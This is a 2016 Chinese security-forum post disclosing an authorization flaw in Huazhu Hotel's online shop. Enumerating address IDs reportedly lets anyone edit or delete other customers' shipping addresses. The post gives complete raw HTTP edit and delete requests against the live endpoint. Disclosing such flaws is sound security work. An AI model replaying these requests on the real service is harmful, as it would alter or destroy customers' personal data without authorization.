HanDs
管理员

[7月漏洞公开] 华住酒店某处越权删除修改用户信息 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

RT

详细说明:

code 区域
商城收货地址越权修改与删除,遍历地址id就可越权操作,目前是3万多地址
https://hmall.huazhu.com/member_addressList.html



华住2000.png



修改:

code 区域
POST /api/shop/memberAddress!edit.do?addr_id=37860 HTTP/1.1
Host: hmall.huazhu.com
Connection: keep-alive
Content-Length: 266
Accept: application/json
Origin: https://hmall.huazhu.com
X-Requested-With: XMLHttpRequest


memberAddres.name=%E9%99%88%E7%94%9F&memberAddres.mobile=13503401234&region=%E5%BE%90%E6%B1%87%E5%8C%BA&city=%E5%BE%90%E6%B1%87%E5%8C%BA&province=%E4%B8%8A%E6%B5%B7&province_id=2&city_id=54&region_id=472&memberAddres.addr=1212&memberAddres.addr_id=37860



删除:

code 区域
GET /api/shop/memberAddress!delete.do?addr_id=37860 HTTP/1.1
Host: hmall.huazhu.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie:

漏洞证明:

华住2002.png

华住2001.png

修复方案:

权限控制


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
华住 酒店 某处 越权 删除 修改 用户 信息
#1楼
发帖时间:2016-7-11   |   查看数:0   |   回复数:0
游客组
快速回复